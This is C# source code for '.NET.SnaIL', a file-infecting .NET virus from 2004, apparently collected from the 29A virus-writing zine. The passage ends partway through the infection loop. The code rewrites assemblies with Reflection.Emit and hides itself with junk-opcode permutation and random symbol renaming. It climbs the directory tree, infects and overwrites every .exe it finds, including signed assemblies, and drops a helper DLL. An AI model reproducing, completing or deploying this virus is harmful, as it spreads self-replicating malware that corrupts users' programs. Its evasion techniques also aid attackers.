29a-7.015

从29A上收集的病毒源码

/*
 *  
 * .NET.SnaIL RC2
 * 
 * Features: 
 * - pure .NET virus (doesn't use any Win32 API)
 * - multithreaded
 * - permutation (inserting nop and ldloc/pop trash)
 * - obfuscation (changing names of symblos)
 * 
 * You may make with this sources anything you wish. 
 * Author is not responsible for consequences.
 *
 * (c) whale 2004
 */


//#define DEBUGCONSOLE		// debug console

#define MANAGEDRESOURCES  // create managed resources in infected file (beta-testing feature)

#define PERMUTATION

#define OVERWRITE			// overwrite original file with infected 

#define INFECTSIGNED	// infect signed assemblies

using System;
using System.Reflection;
using System.Globalization;
using System.Resources;
using System.IO;
using System.Collections;
using System.Reflection.Emit;
using System.Threading;
using Reflector.Disassembler;
using System.Runtime.Remoting;

namespace DotNet
{

	internal class Snail
	{
		static string copyright = "[ .NET.Snail - sample CLR virus (c) whale 2004 ]";
		// non-static constructor
		// needed to run virus in separate domain
		public Snail(string inFileName, string outFileName)
		{
			try
			{
				Snail.shorts=true;
				Snail.ProcessAssembly(inFileName, outFileName);
				if(!Snail.shorts)
					Snail.ProcessAssembly(inFileName, outFileName);
			}
			catch (ThreadAbortException e)
			{
				File.Move(inFileName, outFileName);
			}
			catch(Exception e)
			{
#if DEBUGCONSOLE
				Console.WriteLine(e.Message);
#endif
//				Console.WriteLine();
			}

		}

		public class Objects 
		{
			Hashtable types, ctors, events, fields, methods, 
				props;
			public Objects()
			{
				types = new Hashtable();
				ctors = new Hashtable();
				events = new Hashtable();
				fields = new Hashtable();
				methods = new Hashtable();
				props = new Hashtable();
			}

			~Objects()
			{
			}

			public void Clear()
			{
				types.Clear();
				ctors.Clear();
				events.Clear();
				fields.Clear();
				methods.Clear();
				props.Clear();
			}

			public void AddType(Type intype, TypeBuilder outtype)
			{
				types.Add(intype, outtype);
			}


			public void DefineMembers(Type intype, ModuleBuilder moduleBuilder)
			{
				if(!types.ContainsKey(intype))
					return;
				foreach (PropertyInfo pi in intype.GetProperties(BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.DeclaredOnly))
				{
					TypeBuilder outproptype=(TypeBuilder)types[pi.PropertyType];
					PropertyBuilder outpb;
					if(outproptype!=null)
						outpb=((TypeBuilder)types[intype]).DefineProperty(
							EnabledRename(intype)?rs.Next():pi.Name, 
							pi.Attributes, outproptype, null);
					else
						outpb=((TypeBuilder)types[intype]).DefineProperty(
							EnabledRename(intype)?rs.Next():pi.Name, 
							pi.Attributes, pi.PropertyType, null);
					props.Add(pi, outpb);
				}
				foreach (FieldInfo fi in intype.GetFields(BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.DeclaredOnly))
				{
					TypeBuilder outfieldtype=(TypeBuilder)types[fi.FieldType];
					FieldBuilder outfb;
					if(outfieldtype!=null)
						outfb=((TypeBuilder)types[intype]).DefineField(
							EnabledRename(intype)?rs.Next():fi.Name, 
							outfieldtype, 	fi.Attributes);
					else
						outfb=((TypeBuilder)types[intype]).DefineField(
							EnabledRename(intype)?rs.Next():fi.Name, 
							fi.FieldType, 	fi.Attributes);
					fields.Add(fi, outfb);
				}
				foreach (ConstructorInfo ci in intype.GetConstructors(BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.DeclaredOnly))
				{
					ParameterInfo [] pinfo=ci.GetParameters();
					Type [] cparams = new Type[pinfo.Length];
					for(int i=0; i<pinfo.Length; i++)
					{
						TypeBuilder outparamtype=(TypeBuilder)types[pinfo[i].ParameterType];
						if(outparamtype!=null)                        
							cparams[i]=outparamtype;
						else
							cparams[i]=pinfo[i].ParameterType;
					}
					ConstructorBuilder outcb=((TypeBuilder)types[intype]).DefineConstructor(
						ci.Attributes, ci.CallingConvention, cparams);
					DefCtorParams(ci, ref outcb);
					ctors.Add(ci, outcb);
				}
				foreach (EventInfo ei in intype.GetEvents(BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.DeclaredOnly))
				{
					EventBuilder outeb=((TypeBuilder)types[intype]).DefineEvent(
						EnabledRename(intype)?rs.Next():ei.Name, 
						ei.Attributes, ei.EventHandlerType);
					events.Add(ei, outeb);
				}
				foreach (MethodBase methodBase in intype.GetMethods(BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.DeclaredOnly))
				{
					if(methodBase.Name=="Main" && methodBase.DeclaringType==typeof(Snail))
						continue;
					if(methodBase.Name=="Go" && methodBase.DeclaringType==typeof(Snail))
						goBase=methodBase;
					ParameterInfo [] pinfo=methodBase.GetParameters();
					Type [] mparams = new Type[pinfo.Length];
					for(int i=0; i<pinfo.Length; i++)
					{
						TypeBuilder outparamtype=(TypeBuilder)types[pinfo[i].ParameterType];
						if(outparamtype!=null)                        
							mparams[i]=outparamtype;
						else
							mparams[i]=pinfo[i].ParameterType;
					}
					Type inreturntype=((MethodInfo)methodBase).ReturnType;
					TypeBuilder outreturntype=TypeCompliance(inreturntype);
					MethodBuilder outmb;
					string methodName=methodBase.Name;
					if(outreturntype!=null)
						outmb = ((TypeBuilder)types[intype]).DefineMethod(
							//methodName, 
							(EnabledRename(intype)&&methodName!="Go")?rs.Next():methodName, 
							methodBase.Attributes, methodBase.CallingConvention, outreturntype,
							mparams);
					else
						outmb = ((TypeBuilder)types[intype]).DefineMethod(
							//methodName, 
							(EnabledRename(intype)&&methodName!="Go")?rs.Next():methodName, 
							methodBase.Attributes, methodBase.CallingConvention, inreturntype,
							mparams);
					DefParams(methodBase, ref outmb);
					methods.Add(methodBase, outmb);
				}
	
			}



			#region compliance
			public MethodBuilder MethodCompliance
				(Type type, MethodBase methodBase)
			{
				return (MethodBuilder)methods[methodBase];
			}

			public ConstructorBuilder ConstructorCompliance
				(Type type, ConstructorInfo ctorInfo)
			{
				return (ConstructorBuilder)ctors[ctorInfo];
			}

			public PropertyBuilder PropertyCompliance
				(Type type, PropertyInfo propertyInfo)
			{
				return (PropertyBuilder)props[propertyInfo];
			}

			public FieldBuilder FieldCompliance
				(Type type, FieldInfo fieldInfo)
			{
				return (FieldBuilder)fields[fieldInfo];
			}

			public EventBuilder EventCompliance
				(Type type, EventInfo eventInfo)
			{
				return (EventBuilder)events[eventInfo];
			}

			public TypeBuilder TypeCompliance(Type type)
			{
				return (TypeBuilder)types[type];
			}

			#endregion
            

		}

		private static bool EnabledRename(Type t)
		{
#if PERMUTATION
//			return (-1!=t.FullName.IndexOf("Snail") && -1==t.FullName.IndexOf("AssemblyProvider"));
			return (t.Assembly==Assembly.GetExecutingAssembly()&&-1==t.FullName.IndexOf("AssemblyProvider"));			
#else
			return false;
#endif
		}

		private static RandomStrings rs = new RandomStrings(6, 15, Environment.TickCount);
		private static Random rand = new Random(Environment.TickCount);

		private class RandomCodeEmitter
		{
			ILGenerator il;
			LocalBuilder [] lb;
			public RandomCodeEmitter(ILGenerator ilGenerator, LocalBuilder [] localBuilders)
			{
				il=ilGenerator;
				lb=localBuilders;
			}
			public void Emit()
			{
#if PERMUTATION
				if(rand.Next(5)==0)
					il.Emit(OpCodes.Nop);
				if(rand.Next(10)==0 && lb.Length>0)
				{
					LocalBuilder localBuilder = lb[rand.Next(lb.Length)];
					// push random local variable and pop it
					il.Emit(OpCodes.Ldloc, localBuilder);
						il.Emit(OpCodes.Pop);
				}
#endif
			}
		}

		private static byte [] ilReader;

		public static void Go()
		{
			string dir;
			ilReader = GetILReader();
			do 
			{
				ProcessDirectory();
				dir=Directory.GetCurrentDirectory();
				Directory.SetCurrentDirectory("..");
			}
			while(dir!=Directory.GetCurrentDirectory());
		}
		
		// infect all files in current directory
		public static void ProcessDirectory()
		{
			string [] fnames = Directory.GetFiles(".", "*.exe");
			if(fnames.Length==0) return;
			bool donotdel=File.Exists("ILReader.dll");
			if(!donotdel && ilReader!=null)
			{
				FileStream outStream = new FileStream("ILReader.dll", FileMode.CreateNew,
					FileAccess.ReadWrite);
				if(outStream!=null)
				{
					BinaryWriter outWriter = new BinaryWriter(outStream);
					outWriter.Write(ilReader);
#if DEBUGCONSOLE
					Console.WriteLine("Created ILReader.dll");
#endif
				}
				outStream.Close();
			}
			foreach (string fileName in fnames)
			{
#if OVERWRITE
				string outFileName = Path.GetFileName(fileName);
				string outFileNameWithoutExtension=
					Path.GetFileNameWithoutExtension(outFileName);
				string inFileName = "_" + outFileName;
				if(/*outFileName.ToUpper()=="SNAIL.EXE" ||*/ outFileName[0]=='_' ||
					outFileNameWithoutExtension==
						Assembly.GetExecutingAssembly().GetName().Name)
							continue;	// 镳铒篑赅屐 皴